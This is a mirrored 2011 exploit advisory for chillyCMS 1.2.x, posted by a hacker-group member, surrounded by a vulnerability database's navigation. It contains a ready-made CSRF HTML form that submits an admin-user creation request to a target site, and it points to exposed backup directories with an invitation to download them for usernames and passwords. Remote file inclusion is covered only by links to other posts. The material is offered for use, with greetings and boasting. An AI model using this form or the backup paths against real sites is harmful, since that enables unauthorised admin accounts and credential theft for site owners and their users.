Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormKedAns-DzPACKETSTORM:101603
HistoryMay 22, 2011 - 12:00 a.m.

chillyCMS 1.2.x XSRF / File Disclosure

2011-05-2200:00:00
KedAns-Dz
packetstormsecurity.com
21
JSON
`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KedAns-Dz member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
###  
# Title : chillyCMS v1.2.x (CSRF/FD/RFI) Multiple Vulnerabilities  
# Author : KedAns-Dz  
# E-mail : [email protected] ([email protected]) | [email protected]  
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)  
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com  
# Twitter page : twitter.com/kedans  
# platform : php  
# Impact : Remote Cross-Site Request Forgery + Files Disclosure + RFI  
# Tested on : [Windows XP sp3 FR] & [Linux.(Ubuntu 10.10) En] & [Mac OS X 10.6.1] & [BSDi-BSD/OS 4.2]  
###  
# (~) Greetings To : Caddy-Dz (+) JaGo-Dz (+) Dr.Ride (+) All My Friends   
###  
  
# (!) Exploit & PoC :  
  
#=(1)======[ (CSRF) Add New User :]=======>  
  
<div class='userform'>  
<h1> (CSRF) Add New User :</h1>  
<form method='post' action='http://[target]/usersgroups.site.php'>  
<table>  
<input type='text' name='user' value='KedAns'></input>  
<input type='text' name='name' value='Inj3ct0r'></input>  
<input type='password' name='pw'></input>  
<input type='password' name='pw2'></input>  
<input type='text' name='email' value='[email protected]'></input>  
<input type='radio' name='gids[]' class='middle floatinput' value='1' />  
<a class='admin' title='admin' value='Admin Group'></a>  
<input type='hidden' name='myaction' value='$action'></input>  
<input type='hidden' name='action' value='updateuser'></input>  
<input type='hidden' name='id' value='93'></input>  
</table>  
<input class='button' type='submit' value='Save & Submit'></input>  
</form>  
</div>  
  
(X) Clouting/Fix : - Non Clouting - !!  
  
#=(2)======[File/Backup Disclosure]=======>  
  
http://[target]/[Path]/backup/ <<+  
http://[target]/[Path]/backup/files/ << The Backups is here !  
  
(!) The Access Not Forbidden   
(X) Clouting/Fix : restrict access to this directory by .htaccess file Or Create index.html File  
  
[+] Disclose The Backup And Download him .. Get (User/Pass) or What you Want (^_^)  
  
#=(2)======[Remote File Inclusion]=======>  
  
+> References :   
[http://1337day.com/exploits/15867]  
[http://packetstormsecurity.org/files/view/100510/chillycms-rfi.txt]  
[http://www.exploit-id.com/web-applications/chillycms-v1-2-1-remote-file-inclusion-vulnerability]  
[http://www.linux-backtrack.com/2011/04/webapps-0day-chillycms-v1-2-1-remote-file-inclusion-vulnerability/]  
  
# (^_^) ! Good Luck ALL ...  
  
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================   
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > Islampard + Z4k1-X-EnG + Dr.Ride  
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)   
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu  
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... * Str0ke  
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)  
# JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org)  
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...  
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-  
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever   
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm  
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz  
#================================================================================================  
`
JSON